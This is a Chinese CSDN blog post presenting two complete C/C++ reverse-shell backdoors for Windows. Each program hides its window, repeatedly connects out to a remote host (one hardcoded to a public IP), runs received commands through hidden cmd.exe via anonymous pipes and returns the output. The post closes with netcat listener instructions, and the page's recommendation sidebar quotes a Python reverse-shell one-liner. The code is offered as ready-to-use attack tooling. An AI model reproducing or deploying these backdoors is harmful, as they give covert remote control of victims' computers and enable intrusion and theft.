C/C++ 匿名管道反弹CMDShell

已于 2023-07-21 16:01:37 修改
阅读量5.6k 收藏 3
点赞数
分类专栏: 《Visual C++ 编程技术实践》 文章标签: c++ c语言 网络 开发语言 tcp/ip 反弹后门
于 2018-06-11 19:43:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyshark_csdn/article/details/124939951
版权

这段代码是一个在Windows平台下实现的反向连接(reverse shell)程序。它使用Winsock库进行网络通信,并通过创建套接字与指定的远程主机建立连接。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。

概述:

  1. 包含必要的头文件,并设置链接器指令。
  2. 初始化Winsock(WSAStartup)。
  3. 创建套接字,用于与远程主机建立连接。
  4. 循环尝试连接远程主机,直到连接成功。
  5. 成功连接后,发送连接成功信息到远程主机。
  6. 循环接收本地输入的命令,通过管道执行命令,并将命令输出发送到远程主机。
  7. 若远程主机断开连接,则程序自动退出。
#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>

int main(int argc, char **argv)
{
    char *messages = "======================== Connect successful !========================\n";
    WSADATA WSAData;
    SOCKET sock; //创建套接字
    SOCKADDR_IN addr_in;
    char buf[1024]; //buf作为socket接收数据的缓冲区
    memset(buf, 0, 1024); //清空缓冲区

    WSAStartup(MAKEWORD(2, 2), &WSAData); //初始化ws2

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80); //反向连接的远端主机端口
    addr_in.sin_addr.S_un.S_addr = inet_addr("59.110.167.239"); //远端IP

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    while (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR) //连接客户主机
    {
        Sleep(5000); //连接失败,停顿5s,再试
        continue;
    }

    send(sock, messages, strlen(messages), 0); //发送success信息

    char buffer[2048] = { 0 };//管道输出的数据

    for (char cmdline[270];; memset(cmdline, 0, sizeof(cmdline))){
        SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
        HANDLE hRead, hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;

        CreatePipe(&hRead, &hWrite, &sa, 0); //创建管道

        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si); //STARTUPINFO 结构
        si.hStdError = hWrite;
        si.hStdOutput = hWrite;
        si.wShowWindow = SW_HIDE; //隐藏窗口
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

        GetSystemDirectory(cmdline, MAX_PATH + 1); //获得系统路径
        strcat(cmdline, "//cmd.exe /c"); //路径+/cmd.exe

        int len = recv(sock, buf, 1024, NULL);
        if (len == SOCKET_ERROR) exit(0); //如果客户端断开连接,则自动退出程序

        strncat(cmdline, buf, strlen(buf)); //把命令参数复制到cmdline
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi); //创建进程

        CloseHandle(hWrite);

        for (DWORD bytesRead; ReadFile(hRead, buffer, 2048, &bytesRead, NULL); //循环读取管道中数据并发送,直到管道中没有数据为止
            memset(buffer, 0, 2048)){
            send(sock, buffer, strlen(buffer), 0);
        }
    }
    return 0;
}
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实现远程控制和命令执行。程序使用Winsock库进行网络通信,通过socket连接指定的IP地址和端口。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。

主要功能包括:

  1. 使用Winsock库进行网络通信,通过socket连接指定的IP地址和端口。
  2. 通过创建管道,将控制台命令输出重定向到管道中,并通过网络发送到控制端。
  3. 监听控制端发送的命令,并在被控制端执行这些命令。
  4. 将命令执行结果返回给控制端。
#include <Windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

HANDLE g_hinputPipe, g_houtputPipe;
HANDLE g_hThread;
DWORD g_dwThreadId;
const unsigned short PORT = 4900;
const char * REMOTE_ADDR = "127.0.0.1";
const unsigned int MAXSTR = 255;

//收发信息
bool sendData(SOCKET sSock, char *cmdline, const char* sockData)
{
    ZeroMemory(cmdline, MAXSTR);
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    while (!CreatePipe(&g_houtputPipe, &g_hinputPipe, &sa, 0))
    {
        Sleep(1000);
    }
    Sleep(200);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    GetStartupInfo(&si);
    si.hStdError = g_hinputPipe;
    si.hStdOutput = g_hinputPipe;
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, "\\cmd.exe /c ");
    strcat_s(cmdline, MAXSTR, sockData);
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(1000);
    }
    WaitForSingleObject(pi.hProcess, 10000);
    return true;
}

//被控端管道信息回传监控
DWORD WINAPI WatchData(LPVOID lprarm)
{
    unsigned int g_Ret = 0;
    DWORD dwTotalAvail = 0;
    DWORD realReadLen = 0;
    char readBuffer[4096] = "\0";
    SOCKET sSock = (SOCKET)lprarm;
    while (true)
    {
        g_Ret = PeekNamedPipe(g_houtputPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
        if (g_Ret && dwTotalAvail > 0)
        {
            Sleep(300);
            g_Ret = ReadFile(g_houtputPipe, readBuffer, 4096, &realReadLen, NULL);
            if (g_Ret && realReadLen > 0)
            {
                Sleep(200);
                strcat_s(readBuffer, 4096, "\r\nCMD >");
                send(sSock, readBuffer, strlen(readBuffer), 0);
                ZeroMemory(readBuffer, 4096);
            }
        }
    }
    return 0;
}

//主函数
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    char sendError[30] = "[*] Send Error !\r\n\r\n";
    char cmdline[MAXSTR] = "\0";
    char sockData[MAXSTR] = "\0";
    int sockDataLen = 0;
    SOCKET sSock;
    sockaddr_in sockAddr;
    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd)) return 0;
    if ((sSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
    sockAddr.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(PORT);
    while (connect(sSock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == SOCKET_ERROR)
    {
        Sleep(2000);
        continue;
    }

    g_hThread = CreateThread(NULL, 0, WatchData, LPVOID(sSock), 0, &g_dwThreadId);
    while (true)
    {
        while ((sockDataLen = recv(sSock, sockData, MAXSTR, 0)) == SOCKET_ERROR)
        {
            Sleep(1000);
        }
        if (!sendData(sSock, cmdline, sockData))
        {
            send(sSock, sendError, strlen(sendError), 0);
        }
        ZeroMemory(sockData, MAXSTR);
    }

    WaitForSingleObject(g_hThread, INFINITE);
    CloseHandle(g_hinputPipe);
    CloseHandle(g_houtputPipe);
    closesocket(sSock);
    WSACleanup();
    ExitProcess(0);
    return 0;
}

下载NC netcat 1.11 for Win32/Win64

nc执行命令:nc命令 : -l -v -p [端口] 等待上线

微软技术分享
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言实现简易的shell程序,支持多重管道及重定向
木风feng的博客
05-13 1万+
1 简介 2 功能 3 效果展示 3.1 启动myshell 3.2 执行cd命令 3.3 执行外部命令 3.4 重定向 3.5 管道 3.6 exit命令 4 关键代码 4.1 获取用户名、主机名及当前工作路径 4.2 以空格分割命令 4.3 执行exit命令 4.4 执行cd命令 4.5 判断命令是否存在 4.6 执行外部命令 ——callCommand()函数 4.7 可处...
匿名管道实例 C++
10-25
匿名管道实例C++程序,先打开child.exe,执行parent程序就可。
C语言/C++ 烟花表白代码
10-13
C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码
C语言/C++基础之爱心源码
12-20
C语言/C++基础之爱心源码,适合初学C语言/C++的小伙伴学习研究,博客中有对应的讲解和演示,避免走弯路,费时费力。也真心希望能够帮助正在苦学C语言/C++ 程序设计的小伙伴们,你们的成长是我最大的幸福
二维码(QRcode)生成算法 C语言/C++源码
02-11
#二维码(QRcode)生成算法 C语言/C++ 源码 1. 根据输入字符串识别编码模式; 2. 根据输入字符串长度选择合适的QRcode版本; 3. 将编码转换为二进制位流表示为数据码字; 4. 使用多项式生成纠错码; 5. 将数据码和纠错码排列到二维码上; 6. 加入定位符号、时序符号等; 7. 加入格式信息; 8. 在命令行输出二维码样式。
Linux下的C/C++、python编程和shell编程
08-02
1. 实训目的 掌握Linux下编程,熟悉Linux的编程 2. 实训内容 1) Linux下的C/C++编程,编写简单的C/C++程序并编译运行。 2) Linux下的python 编程,利用python语言编写程序。 3) Linux下的shell编程,从键盘输入任意值,然后利用while进行求和运算。 3. 实训总结 通过本次实训,能够掌握Linux下的各种编程工具。
数据库提权,Mssql xp_cmdshell提权
luSaMa的博客
07-06 1743
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
windows 弹shell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 635
如何在WIndows下编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windows 下shellcode的编写,为要编写Shellcdoe的读者提供一些参考。摘要:在C语言中,调用一...
记一次对python反弹shell的分析
weixin_30526593的博客
08-28 967
前言 昨天学习了反弹shell,对python弹shell产生了一些疑惑 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);...
C/C++编写的反向SHELL
hambaga的博客
04-08 1975
转载来源: https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/ http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/ 下面是我根据原文的修改,将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。 ...
win32_reverse_shell:用c ++编写的反向shell,支持DNS名称解析,因此您可以将其与NGROK或任何您使用的东西一起使用
02-12
win32_reverse_shell 用C ++编写的反向Shell支持DNS名称解析,因此您可以将其与NGROK或任何您使用的东西一起使用 显然,includes.h是我通常用于每个项目的常规包含文件。 如果您需要减轻二进制文件的大小,请随意删除以下标头: #include <iostream> #include <time> #include <queue> #include <assert> #include <fstream> #include <algorithm> #include <sstream> using std::string; using std::queue; using std::vector; using std::ostringstream; 当前,这可能会被任何优秀的防病毒软件捕获,但是将来我计划将其实施到win32 shellcode中,然
C语言/C++基础之爱心程序源码
12-20
C语言/C++基础之爱心程序源码,适合初学C语言/C++的小伙伴学习研究,博客中有对应的讲解和演示,避免走弯路,费时费力。也真心希望能够帮助正在苦学C语言/C++ 程序设计的小伙伴们,你们的成长是我最大的幸福
Windows下管道后门及反向shell编写与总结(C++)
輚至消亡
09-20 711
1. 双管道被动连接型后门 #define _CRT_SECURE_NO_WARNINGS #define _WINSOCK_DEPRECATED_NO_WARNINGS #include <WinSock2.h> #include <iostream> #include <windows.h> #include <cstdlib> #include <iostream> #include <urlmon.h> #include &
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmdshell
weixin_39942474的博客
05-22 707
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
shell while 结束循环_Linux技巧:使用bash read命令实现一个简易shell(完整版)
weixin_39527768的博客
10-21 1194
在 Linux 上面,可以使用 bash 的 read 内置命令来读取用户输入。当在 while 循环中不断调用 read 命令,并打印一些提示字符,如 $、#、> 等,就可以不断接收用户输入,并执行一些自定义的命令,类似一个简易的 shell。下面主要是介绍 read 命令的常见用法,用来逐步实现一个简易的 shell 效果。read 命令介绍在 bash 中,read 内置命令可以读取用...
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2375
如何实现反弹shell检测?
CVE初探之CVE-2019-6250反弹Shell
蚁景网安学院
12-06 474
概述ZMQ(Zero Message Queue)是一种基于消息队列得多线程网络库,C++编写,可以使得Socket编程更加简单高效。该编号为CVE-2019-6250的远程执行漏洞,主要出现在ZMQ的核心引擎libzmq(4.2.x以及4.3.1之后的4.3.x)定义的ZMTP v2.0协议中。这一漏洞已经有很多师傅都已经分析并复现过了,但在环境搭建和最后的利用都所少有一些不完整,为了更好的学习...
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1396
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
初识C语言——第二十一天
最新发布
硬件菜鸟的成长之路
05-15 629
1.rand()函数是只能生成伪随机数,并且无返回值,使用前需调用srand()伪随机数生成器作为起点2.time()函数是结构体函数,返回值是64为整数类型,可以通过time函数生成时间戳时间戳-函数调用的时间点和计算机的初始时间点之间的时间间隔3.void()函数-无返回值类型函数4.while(1)-一直循环,直到break跳出。
深信服的C语言/c++笔试题如何提升自己
04-05
以下是一些提升深信服C语言/c笔试能力的方法: 1. 学习C语言/c的基础知识:掌握语法、数据类型、变量、运算符、流程控制语句等基础知识,理解指针、数组、结构体等高级数据结构。 2. 练习编写代码:通过练习写小程序、算法等,提高自己的编写代码能力。 3. 熟悉常用的C语言/c库函数:掌握常用的库函数,如stdio.h、stdlib.h、string.h等,对于字符串处理、内存分配、文件操作等常用场景熟练掌握。 4. 多做练习题:通过做各种难度的练习题,了解常见的问题和解决方案,提高自己的问题解决能力。 5. 参加竞赛:参加各种编程竞赛,如ACM、ICPC等,锻炼自己的算法和编程能力。 6. 学习数据结构和算法:学习常见的数据结构和算法,如栈、队列、堆、排序、查找等,掌握它们的原理和应用场景。 7. 阅读C语言/c源码:阅读开源项目的源码,了解代码的实现细节和设计思路,提高自己的代码阅读和理解能力。 8. 交流学习:与其他C语言/c程序员交流学习,分享经验和技巧,相互帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值